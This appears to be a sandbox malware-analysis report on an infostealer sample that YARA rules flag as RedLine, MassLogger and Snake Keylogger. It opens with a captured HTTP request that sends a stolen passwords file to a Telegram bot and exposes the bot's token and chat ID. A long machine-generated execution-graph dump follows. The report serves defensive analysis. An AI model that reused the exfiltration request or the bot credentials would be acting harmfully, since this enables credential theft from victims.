2025-01-11 01:55:28 UTC | 295 | OUT | POST /bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437092720&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd31b91c731df5
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
2025-01-11 01:55:29 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 62 39 31 63 37 33 31 64 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    Data Ascii: --===============8dd31b91c731df5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 01:55:29 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Sat, 11 Jan 2025 01:55:29 GMT
    Content-Type: application/json
    Content-Length: 561
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 01:55:29 UTC | 561 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 35 32 33 39 33 39 31 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 4f 56 41 4c 4f 47 47 45 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4e 4f 56 41 4c 4f 47 47 45 52 44 41 4e 4e 59 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 34 33 37 30 39 32 37 32 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 49 66 65 61 6e 79 69 63 68 75 6b 77 75 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 49 66 65 61 6e 79 69 63 68 75 6b 77 75 30 30 39 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 36 30 35 32 39 2c
    Data Ascii: {"ok":true,"result":{"message_id":1984,"from":{"id":8152393919,"is_bot":true,"first_name":"NOVALOGGER","username":"NOVALOGGERDANNYbot"},"chat":{"id":1437092720,"first_name":"Ifeanyichukwu","username":"Ifeanyichukwu009","type":"private"},"date":1736560529,


                                                                        Target ID:0
                                                                        Start time:20:55:16
                                                                        Start date:10/01/2025
                                                                        Path:C:\Users\user\Desktop\njVvgA8pEB.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\njVvgA8pEB.exe"
                                                                        Imagebase:0x310000
                                                                        File size:1'118'720 bytes
                                                                        MD5 hash:D689D0763FAAA679D5DF32A3C14F9708
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1722801122.0000000000FF0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:1
                                                                        Start time:20:55:17
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\Desktop\njVvgA8pEB.exe"
                                                                        Imagebase:0x1b0000
                                                                        File size:45'984 bytes
                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:2
                                                                        Start time:20:55:17
                                                                        Start date:10/01/2025
                                                                        Path:C:\Users\user\Desktop\njVvgA8pEB.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\njVvgA8pEB.exe"
                                                                        Imagebase:0x310000
                                                                        File size:1'118'720 bytes
                                                                        MD5 hash:D689D0763FAAA679D5DF32A3C14F9708
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.1740251386.0000000001400000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:20:55:18
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\njVvgA8pEB.exe"
                                                                        Imagebase:0xbb0000
                                                                        File size:45'984 bytes
                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.4183734715.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                        Reputation:high
                                                                        Has exited:false


                                                                          Execution Graph

                                                                          Execution Coverage:3.5%
                                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                                          Signature Coverage:7.6%
                                                                          Total number of Nodes:2000
                                                                          Total number of Limit Nodes:164
[execution_graph: serialized node and edge listing of the interactive Execution Graph widget (node ids, code addresses and API names such as PostQuitMessage, DefWindowProcW, SetTimer, CreatePopupMenu, Shell_NotifyIconW, RegOpenKeyExW, RegQueryValueExW, RtlAllocateHeap, EnterCriticalSection); the raw listing is not reproduced here]
100517->100518 100519 339ca8 100517->100519 100527 339ce1 type_info::_Type_info_dtor 100518->100527 100544 33881d 58 API calls __malloc_crt 100518->100544 100541 33a16b 58 API calls __NMSG_WRITE 100519->100541 100522 339cad 100542 33a1c8 58 API calls 4 library calls 100522->100542 100523 339cd5 100525 339ceb 100523->100525 100526 339cdc 100523->100526 100530 339c0b __lock 58 API calls 100525->100530 100545 338b28 58 API calls __getptd_noexit 100526->100545 100527->100513 100528 339cb4 100543 33309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100528->100543 100532 339cf2 100530->100532 100534 339d17 100532->100534 100535 339cff 100532->100535 100547 332d55 100534->100547 100546 339e2b InitializeCriticalSectionAndSpinCount 100535->100546 100538 339d0b 100553 339d33 LeaveCriticalSection _doexit 100538->100553 100541->100522 100542->100528 100544->100523 100545->100527 100546->100538 100548 332d87 __dosmaperr 100547->100548 100549 332d5e RtlFreeHeap 100547->100549 100548->100538 100549->100548 100550 332d73 100549->100550 100554 338b28 58 API calls __getptd_noexit 100550->100554 100552 332d79 GetLastError 100552->100548 100553->100527 100554->100552 100555->100501 100556->100500 100557->100504 100561 339d75 LeaveCriticalSection 100558->100561 100560 332c87 100560->100491 100561->100560 100562 337c56 100563 337c62 type_info::_Type_info_dtor 100562->100563 100599 339e08 GetStartupInfoW 100563->100599 100565 337c67 100601 338b7c GetProcessHeap 100565->100601 100567 337cbf 100568 337cca 100567->100568 100684 337da6 58 API calls 3 library calls 100567->100684 100602 339ae6 100568->100602 100571 337cd0 100572 337cdb __RTC_Initialize 100571->100572 100685 337da6 58 API calls 3 library calls 100571->100685 100623 33d5d2 100572->100623 100575 337cea 100576 337cf6 GetCommandLineW 100575->100576 100686 337da6 58 API calls 3 library calls 100575->100686 100642 344f23 GetEnvironmentStringsW 100576->100642 100579 337cf5 100579->100576 100582 337d10 100583 
337d1b 100582->100583 100687 3330b5 58 API calls 3 library calls 100582->100687 100652 344d58 100583->100652 100586 337d21 100587 337d2c 100586->100587 100688 3330b5 58 API calls 3 library calls 100586->100688 100666 3330ef 100587->100666 100590 337d34 100591 337d3f __wwincmdln 100590->100591 100689 3330b5 58 API calls 3 library calls 100590->100689 100672 3147d0 100591->100672 100594 337d53 100595 337d62 100594->100595 100690 333358 58 API calls _doexit 100594->100690 100691 3330e0 58 API calls _doexit 100595->100691 100598 337d67 type_info::_Type_info_dtor 100600 339e1e 100599->100600 100600->100565 100601->100567 100692 333187 36 API calls 2 library calls 100602->100692 100604 339aeb 100693 339d3c InitializeCriticalSectionAndSpinCount __ioinit 100604->100693 100606 339af0 100607 339af4 100606->100607 100695 339d8a TlsAlloc 100606->100695 100694 339b5c 61 API calls 2 library calls 100607->100694 100610 339af9 100610->100571 100611 339b06 100611->100607 100612 339b11 100611->100612 100696 3387d5 100612->100696 100615 339b53 100704 339b5c 61 API calls 2 library calls 100615->100704 100618 339b32 100618->100615 100620 339b38 100618->100620 100619 339b58 100619->100571 100703 339a33 58 API calls 4 library calls 100620->100703 100622 339b40 GetCurrentThreadId 100622->100571 100624 33d5de type_info::_Type_info_dtor 100623->100624 100625 339c0b __lock 58 API calls 100624->100625 100626 33d5e5 100625->100626 100627 3387d5 __calloc_crt 58 API calls 100626->100627 100629 33d5f6 100627->100629 100628 33d661 GetStartupInfoW 100631 33d7a5 100628->100631 100633 33d676 100628->100633 100629->100628 100630 33d601 type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 100629->100630 100630->100575 100632 33d86d 100631->100632 100636 33d7f2 GetStdHandle 100631->100636 100638 33d805 GetFileType 100631->100638 100717 339e2b InitializeCriticalSectionAndSpinCount 100631->100717 100718 33d87d LeaveCriticalSection _doexit 100632->100718 100633->100631 100635 3387d5 __calloc_crt 58 API calls 
100633->100635 100637 33d6c4 100633->100637 100635->100633 100636->100631 100637->100631 100639 33d6f8 GetFileType 100637->100639 100716 339e2b InitializeCriticalSectionAndSpinCount 100637->100716 100638->100631 100639->100637 100643 337d06 100642->100643 100644 344f34 100642->100644 100648 344b1b GetModuleFileNameW 100643->100648 100719 33881d 58 API calls __malloc_crt 100644->100719 100646 344f5a _memmove 100647 344f70 FreeEnvironmentStringsW 100646->100647 100647->100643 100649 344b4f _wparse_cmdline 100648->100649 100651 344b8f _wparse_cmdline 100649->100651 100720 33881d 58 API calls __malloc_crt 100649->100720 100651->100582 100653 344d71 __NMSG_WRITE 100652->100653 100657 344d69 100652->100657 100654 3387d5 __calloc_crt 58 API calls 100653->100654 100655 344d9a __NMSG_WRITE 100654->100655 100655->100657 100658 3387d5 __calloc_crt 58 API calls 100655->100658 100659 344df1 100655->100659 100660 344e16 100655->100660 100663 344e2d 100655->100663 100721 344607 58 API calls __filbuf 100655->100721 100656 332d55 _free 58 API calls 100656->100657 100657->100586 100658->100655 100659->100656 100661 332d55 _free 58 API calls 100660->100661 100661->100657 100722 338dc6 IsProcessorFeaturePresent 100663->100722 100665 344e39 100665->100586 100667 3330fb __IsNonwritableInCurrentImage 100666->100667 100745 33a4d1 100667->100745 100669 333119 __initterm_e 100670 332d40 __cinit 67 API calls 100669->100670 100671 333138 _doexit __IsNonwritableInCurrentImage 100669->100671 100670->100671 100671->100590 100673 3147ea 100672->100673 100683 314889 100672->100683 100674 314824 IsThemeActive 100673->100674 100748 33336c 100674->100748 100678 314850 100760 3148fd SystemParametersInfoW SystemParametersInfoW 100678->100760 100680 31485c 100761 313b3a 100680->100761 100682 314864 SystemParametersInfoW 100682->100683 100683->100594 100684->100568 100685->100572 100686->100579 100690->100595 100691->100598 100692->100604 100693->100606 100694->100610 100695->100611 100698 3387dc 
100696->100698 100699 338817 100698->100699 100700 3387fa 100698->100700 100705 3451f6 100698->100705 100699->100615 100702 339de6 TlsSetValue 100699->100702 100700->100698 100700->100699 100713 33a132 Sleep 100700->100713 100702->100618 100703->100622 100704->100619 100706 345201 100705->100706 100707 34521c 100705->100707 100706->100707 100708 34520d 100706->100708 100709 34522c HeapAlloc 100707->100709 100711 345212 100707->100711 100715 3333a1 DecodePointer 100707->100715 100714 338b28 58 API calls __getptd_noexit 100708->100714 100709->100707 100709->100711 100711->100698 100713->100700 100714->100711 100715->100707 100716->100637 100717->100631 100718->100630 100719->100646 100720->100651 100721->100655 100723 338dd1 100722->100723 100728 338c59 100723->100728 100727 338dec 100727->100665 100729 338c73 _memset ___raise_securityfailure 100728->100729 100730 338c93 IsDebuggerPresent 100729->100730 100736 33a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 100730->100736 100733 338d7a 100735 33a140 GetCurrentProcess TerminateProcess 100733->100735 100734 338d57 ___raise_securityfailure 100737 33c5f6 100734->100737 100735->100727 100736->100734 100738 33c600 IsProcessorFeaturePresent 100737->100738 100739 33c5fe 100737->100739 100741 34590a 100738->100741 100739->100733 100744 3458b9 5 API calls ___raise_securityfailure 100741->100744 100743 3459ed 100743->100733 100744->100743 100746 33a4d4 EncodePointer 100745->100746 100746->100746 100747 33a4ee 100746->100747 100747->100669 100749 339c0b __lock 58 API calls 100748->100749 100750 333377 DecodePointer EncodePointer 100749->100750 100813 339d75 LeaveCriticalSection 100750->100813 100752 314849 100753 3333d4 100752->100753 100754 3333f8 100753->100754 100755 3333de 100753->100755 100754->100678 100755->100754 100814 338b28 58 API calls __getptd_noexit 100755->100814 100757 3333e8 100815 338db6 9 API calls __filbuf 100757->100815 100759 3333f3 100759->100678 100760->100680 100762 313b47 __write_nolock 
100761->100762 100763 317667 59 API calls 100762->100763 100764 313b51 GetCurrentDirectoryW 100763->100764 100816 313766 100764->100816 100766 313b7a IsDebuggerPresent 100767 34d272 MessageBoxA 100766->100767 100768 313b88 100766->100768 100770 34d28c 100767->100770 100768->100770 100771 313ba5 100768->100771 100799 313c61 100768->100799 100769 313c68 SetCurrentDirectoryW 100772 313c75 Mailbox 100769->100772 101015 317213 59 API calls Mailbox 100770->101015 100897 317285 100771->100897 100772->100682 100775 34d29c 100780 34d2b2 SetCurrentDirectoryW 100775->100780 100777 313bc3 GetFullPathNameW 100778 317bcc 59 API calls 100777->100778 100779 313bfe 100778->100779 100913 32092d 100779->100913 100780->100772 100783 313c1c 100784 313c26 100783->100784 101016 36874b AllocateAndInitializeSid CheckTokenMembership FreeSid 100783->101016 100929 313a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 100784->100929 100787 34d2cf 100787->100784 100790 34d2e0 100787->100790 101017 314706 100790->101017 100791 313c30 100793 313c43 100791->100793 100795 31434a 68 API calls 100791->100795 100937 3209d0 100793->100937 100794 34d2e8 101024 317de1 100794->101024 100795->100793 100798 313c4e 100798->100799 101014 31443a Shell_NotifyIconW _memset 100798->101014 100799->100769 100800 34d2f5 100802 34d324 100800->100802 100803 34d2ff 100800->100803 100813->100752 100814->100757 100815->100759 100817 317667 59 API calls 100816->100817 100818 31377c 100817->100818 101028 313d31 100818->101028 100820 31379a 100821 314706 61 API calls 100820->100821 100822 3137ae 100821->100822 100823 317de1 59 API calls 100822->100823 100824 3137bb 100823->100824 101042 314ddd 100824->101042 100827 34d173 101109 37955b 100827->101109 100828 3137dc Mailbox 100832 318047 59 API calls 100828->100832 100831 34d192 100834 332d55 _free 58 API calls 100831->100834 100835 3137ef 100832->100835 100836 34d19f 100834->100836 101066 31928a 100835->101066 100838 314e4a 84 API calls 100836->100838 100840 
34d1a8 100838->100840 100844 313ed0 59 API calls 100840->100844 100841 317de1 59 API calls 100842 313808 100841->100842 101069 3184c0 100842->101069 100846 34d1c3 100844->100846 100845 31381a Mailbox 100847 317de1 59 API calls 100845->100847 100849 313ed0 59 API calls 100846->100849 100848 313840 100847->100848 100851 3184c0 69 API calls 100848->100851 100850 34d1df 100849->100850 100852 314706 61 API calls 100850->100852 100854 31384f Mailbox 100851->100854 100853 34d204 100852->100853 100855 313ed0 59 API calls 100853->100855 100857 317667 59 API calls 100854->100857 100856 34d210 100855->100856 100858 318047 59 API calls 100856->100858 100859 31386d 100857->100859 100860 34d21e 100858->100860 101073 313ed0 100859->101073 100862 313ed0 59 API calls 100860->100862 100864 34d22d 100862->100864 100871 318047 59 API calls 100864->100871 100866 313887 100866->100840 100867 313891 100866->100867 100868 332efd _W_store_winword 60 API calls 100867->100868 100869 31389c 100868->100869 100869->100846 100870 3138a6 100869->100870 100873 332efd _W_store_winword 60 API calls 100870->100873 100872 34d24f 100871->100872 100874 313ed0 59 API calls 100872->100874 100875 3138b1 100873->100875 100876 34d25c 100874->100876 100875->100850 100877 3138bb 100875->100877 100876->100876 100878 332efd _W_store_winword 60 API calls 100877->100878 100879 3138c6 100878->100879 100879->100864 100880 313907 100879->100880 100882 313ed0 59 API calls 100879->100882 100880->100864 100881 313914 100880->100881 101089 3192ce 100881->101089 100884 3138ea 100882->100884 100886 318047 59 API calls 100884->100886 100888 3138f8 100886->100888 100890 313ed0 59 API calls 100888->100890 100890->100880 100892 31928a 59 API calls 100894 31394f 100892->100894 100893 318ee0 60 API calls 100893->100894 100894->100892 100894->100893 100895 313ed0 59 API calls 100894->100895 100896 313995 Mailbox 100894->100896 100895->100894 100896->100766 100898 317292 __write_nolock 100897->100898 100899 34ea22 _memset 
100898->100899 100900 3172ab 100898->100900 100902 34ea3e GetOpenFileNameW 100899->100902 101974 314750 100900->101974 100904 34ea8d 100902->100904 100907 317bcc 59 API calls 100904->100907 100909 34eaa2 100907->100909 100909->100909 100910 3172c9 102002 31686a 100910->102002 100914 32093a __write_nolock 100913->100914 102254 316d80 100914->102254 100916 32093f 100928 313c14 100916->100928 102265 32119e 89 API calls 100916->102265 100918 32094c 100918->100928 102266 323ee7 91 API calls Mailbox 100918->102266 100920 320955 100921 320959 GetFullPathNameW 100920->100921 100920->100928 100922 317bcc 59 API calls 100921->100922 100923 320985 100922->100923 100924 317bcc 59 API calls 100923->100924 100925 320992 100924->100925 100926 317bcc 59 API calls 100925->100926 100927 354cab _wcscat 100925->100927 100926->100928 100928->100775 100928->100783 100930 313ab0 LoadImageW RegisterClassExW 100929->100930 100931 34d261 100929->100931 102303 313041 7 API calls 100930->102303 102304 3147a0 LoadImageW EnumResourceNamesW 100931->102304 100934 313b34 100936 3139d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 100934->100936 100935 34d26a 100936->100791 100938 354cc3 100937->100938 100950 3209f5 100937->100950 102361 379e4a 89 API calls 4 library calls 100938->102361 100940 320ce4 100941 320cfa 100940->100941 102358 321070 10 API calls Mailbox 100940->102358 100941->100798 100944 320ee4 100944->100941 100946 320ef1 100944->100946 100945 320a4b PeekMessageW 100975 320a05 Mailbox 100945->100975 102359 321093 331 API calls Mailbox 100946->102359 100949 320ef8 LockWindowUpdate DestroyWindow GetMessageW 100949->100941 100950->100975 102362 319e5d 60 API calls 100950->102362 102363 366349 331 API calls 100950->102363 100951 354e81 Sleep 100951->100975 100956 354d50 TranslateAcceleratorW 100957 320e43 PeekMessageW 100956->100957 100956->100975 100957->100975 100958 320ea5 TranslateMessage DispatchMessageW 100958->100957 100959 320d13 timeGetTime 100959->100975 100960 35581f 
WaitForSingleObject 100962 35583c GetExitCodeProcess CloseHandle 100960->100962 100960->100975 100967 320f95 100962->100967 100963 320e5f Sleep 100983 320e70 Mailbox 100963->100983 100964 318047 59 API calls 100964->100975 100965 317667 59 API calls 100965->100983 100966 330db6 59 API calls Mailbox 100966->100975 100967->100798 100968 355af8 Sleep 100968->100983 100971 33049f timeGetTime 100971->100983 100972 320f4e timeGetTime 102360 319e5d 60 API calls 100972->102360 100975->100940 100975->100945 100975->100951 100975->100956 100975->100957 100975->100958 100975->100959 100975->100960 100975->100963 100975->100964 100975->100966 100975->100967 100975->100968 100975->100972 100975->100983 100986 319e5d 60 API calls 100975->100986 100995 319ea0 304 API calls 100975->100995 100999 317de1 59 API calls 100975->100999 101002 379e4a 89 API calls 100975->101002 101003 319c90 59 API calls Mailbox 100975->101003 101004 3184c0 69 API calls 100975->101004 101005 31b73c 304 API calls 100975->101005 101007 36617e 59 API calls Mailbox 100975->101007 101008 3189b3 69 API calls 100975->101008 101009 3555d5 VariantClear 100975->101009 101010 366e8f 59 API calls 100975->101010 101011 35566b VariantClear 100975->101011 101012 355419 VariantClear 100975->101012 101013 318cd4 59 API calls Mailbox 100975->101013 102305 31e6a0 100975->102305 102336 31f460 100975->102336 102355 31e420 331 API calls 100975->102355 102356 31fce0 331 API calls 2 library calls 100975->102356 102357 3131ce IsDialogMessageW GetClassLongW 100975->102357 102364 396018 59 API calls 100975->102364 102365 379a15 59 API calls Mailbox 100975->102365 102366 36d4f2 59 API calls 100975->102366 102367 319837 100975->102367 102385 3660ef 59 API calls 2 library calls 100975->102385 102386 318401 59 API calls 100975->102386 102387 3182df 59 API calls Mailbox 100975->102387 100976 355b8f GetExitCodeProcess 100981 355ba5 WaitForSingleObject 100976->100981 100982 355bbb CloseHandle 100976->100982 100979 395f25 110 API calls 
100979->100983 100980 31b7dd 109 API calls 100980->100983 100981->100975 100981->100982 100982->100983 100983->100965 100983->100967 100983->100971 100983->100975 100983->100976 100983->100979 100983->100980 100985 355874 100983->100985 100987 355c17 Sleep 100983->100987 100988 355078 Sleep 100983->100988 100989 317de1 59 API calls 100983->100989 102388 372408 60 API calls 100983->102388 102389 319e5d 60 API calls 100983->102389 102390 3189b3 69 API calls Mailbox 100983->102390 102391 31b73c 331 API calls 100983->102391 102392 3664da 60 API calls 100983->102392 102393 375244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 100983->102393 102394 373c55 66 API calls Mailbox 100983->102394 100985->100967 100986->100975 100987->100975 100988->100975 100989->100983 100995->100975 100999->100975 101002->100975 101003->100975 101004->100975 101005->100975 101007->100975 101008->100975 101009->100975 101010->100975 101011->100975 101012->100975 101013->100975 101014->100799 101015->100775 101016->100787 101018 341940 __write_nolock 101017->101018 101019 314713 GetModuleFileNameW 101018->101019 101020 317de1 59 API calls 101019->101020 101021 314739 101020->101021 101022 314750 60 API calls 101021->101022 101023 314743 Mailbox 101022->101023 101023->100794 101025 317df0 __NMSG_WRITE _memmove 101024->101025 101026 330db6 Mailbox 59 API calls 101025->101026 101027 317e2e 101026->101027 101027->100800 101029 313d3e __write_nolock 101028->101029 101030 317bcc 59 API calls 101029->101030 101035 313ea4 Mailbox 101029->101035 101032 313d70 101030->101032 101041 313da6 Mailbox 101032->101041 101150 3179f2 101032->101150 101033 3179f2 59 API calls 101033->101041 101034 313e77 101034->101035 101036 317de1 59 API calls 101034->101036 101035->100820 101038 313e98 101036->101038 101037 317de1 59 API calls 101037->101041 101039 313f74 59 API calls 101038->101039 101039->101035 101041->101033 101041->101034 101041->101035 101041->101037 101153 313f74 
101041->101153 101159 314bb5 101042->101159 101047 34d8e6 101050 314e4a 84 API calls 101047->101050 101048 314e08 LoadLibraryExW 101169 314b6a 101048->101169 101052 34d8ed 101050->101052 101054 314b6a 3 API calls 101052->101054 101056 34d8f5 101054->101056 101055 314e2f 101055->101056 101057 314e3b 101055->101057 101195 314f0b 101056->101195 101059 314e4a 84 API calls 101057->101059 101061 3137d4 101059->101061 101061->100827 101061->100828 101063 34d91c 101203 314ec7 101063->101203 101065 34d929 101067 330db6 Mailbox 59 API calls 101066->101067 101068 3137fb 101067->101068 101068->100841 101071 3184cb 101069->101071 101070 3184f2 101070->100845 101071->101070 101633 3189b3 69 API calls Mailbox 101071->101633 101074 313ef3 101073->101074 101075 313eda 101073->101075 101076 317bcc 59 API calls 101074->101076 101077 318047 59 API calls 101075->101077 101078 313879 101076->101078 101077->101078 101079 332efd 101078->101079 101080 332f09 101079->101080 101081 332f7e 101079->101081 101088 332f2e 101080->101088 101634 338b28 58 API calls __getptd_noexit 101080->101634 101636 332f90 60 API calls 3 library calls 101081->101636 101084 332f8b 101084->100866 101085 332f15 101635 338db6 9 API 